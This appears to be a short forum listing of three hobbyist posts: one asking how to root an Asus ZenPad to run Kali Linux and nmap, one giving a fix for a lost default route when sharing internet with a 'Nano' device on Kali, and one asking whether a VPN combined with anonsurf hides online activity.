  23. Hi guys & girls, what is the best way to root an android tablet? The tablet in question is a Asus Zen pad z300m. was wondering if Kali linux would run on this device? if not, what can I install on the tablet to learn wireless security. Can I also install nmap?
  24. All, The articles I read on here for getting Internet sharing working in Linux did not work for me on Kali Linux 2017.2 using WIFI as your internet connection. This will hopefully help those of you who run into the same problem I had. When using the wp6.sh script and hitting manual setup, it will actually remove your default route that is set in Kali. I'm not sure why it's doing this, despite specifying the default route during the wp6.sh manual setup steps. However, this is a simple fix. Go to the WIFI icon in the top right hand corner of Kali desktop and turn WIFI off. Turn WIFI back on and your default route should get re-added back to your route table. This should get internet sharing working with your Nano. Too lazy to specify the command line for this, you may even try restarting your network-manager service ($ service network-manager restart) but I havent tried this and dont want to :) Good luck! Hopefully this article helps someone.
  25. hello ive recently read a lot about anonsurf and was wondering if turning a vpn on before turning on anonsurf would ghost my activity? If not I would love to hear your thoughts about the best way to become ghost online.
×
×
  • Create New...